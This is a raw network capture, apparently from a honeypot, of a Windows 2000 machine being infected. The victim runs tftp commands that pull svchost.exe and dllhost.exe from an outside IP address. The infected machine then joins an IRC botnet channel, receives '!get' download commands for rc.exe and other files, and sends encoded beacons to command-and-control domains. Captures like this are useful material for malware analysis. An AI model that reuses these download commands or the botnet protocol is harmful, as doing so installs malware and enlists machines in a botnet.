Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 175.112.215.180 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 175.112.215.180 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	\000\004\000; 
VICTIM:  	\000\004\000< 
VICTIM:  	\000\004\000= 
VICTIM:  	\000\004\000> 
VICTIM:  	\000\004\000? 
VICTIM:  	\000\004\000@ 
VICTIM:  	\000\004\000A 
VICTIM:  	\000\004\000B 
VICTIM:  	\000\004\000C 
VICTIM:  	\000\004\000D 
VICTIM:  	\000\004\000E 
VICTIM:  	Transfer successful: 35088 bytes in 12 seconds, 2924 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	tftp -i 175.112.215.180 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	Transfer successful: 25600 bytes in 9 seconds, 2844 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK aiyxhpodUSER s020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG aiyxhpod :!get http:/ad.ghura.pl/rc.exe:u. PRIVMSG aiyxhpod :!get http:/www.derquda.com/kb8.txt 
VICTIM:  	GET /rc.exe HTTP/1.0User-Agent: DownloadHost: ad.ghura.plPragma: no-cache 
ATTACKER:	GET /kb8.txt HTTP/1.0User-Agent: DownloadHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /ert/nop4.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /ert/mno3.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /ert/lmn2.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /ert/klm1.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /list.php?c=DDC5C512B5035DF1AA4DE6CEFCB9D001C0599EA5290B87101D2A410051F619218DB3BAA7C6B15C3221582BB13075280ADD27D423DFA65E0FB1C5&v=2&t=0.8541986 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /upload/int.exe?t=5.303591E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: anotherdomainname.inConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=ACB25ABEFF6F36E28B934E61B0FDBF7865FDA8933062D41DA0C2C1B5C31BC097347C46ABB4F5AD826A5DE9853C3302ECE32D56B1A6CBEFBFDDEC6913B1CB45DBB2CE9EED36E78C13A19BC9B30AE44F90D126073A2658BBBD9331F49905ED681CE8BE1E144E5577DB43F0BA3DB3B3DD47906796B9195EFED9742D4F20F94F7EC0D7D1C462062B549CA098CA9C10D720A3&t=0.869198 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=ECF233D76BFBD206DCC4AB846924E027D94182B9BEEC965FD6B46D19964E80D70149719C3372E8C7497E573B909FF01E1ED05ABD4429DD8D78492258A8D2B6281A66F6853CED0E9118222D5747A91EC19760E5D8BEC01711D476F895678FB5C167312C263E2518B4C97AAA3C18E1D05815E0B2EC86D536070B1F8CF9FC5E03F95A4AC26B33061BA41F2B8CD9CB0AAA2E&t=0.6767084 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache 
VICTIM:  	\001\000\000\000EFv5 
VICTIM:  	\025\310\3741\225 ?\031S\272{\274M\272\353\322,+v\220#|\321\216\315>[\025\310\3741\226 ?\031Q\272|\274A\272\331\3230(\352\274E\272v\274\025\310\3741\224 ?\031Q\272~\274A\272\351\3316-\337\323+\272\313\2053\357\025\310\3741\227 ?\031Q\272}\274A\272\354\331+\036\345\316E\275v\274E\025\310\3741\226 ?\031W\272~\274G\272\342\3307.\357\314 \272w\274\025\310\3741\227 ?\031Q\272}\274A\272\342\33070\333\316E\036v\274E\025\310\3741\246 ?\031\\\272}\274V\272\355\325+0\333\316E\277v\274E\272v\274EM~\274E\274v\274E\272v\275\027\337\3607\206 ?\031 
ATTACKER:	PING :k. 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :k. 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :k. 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu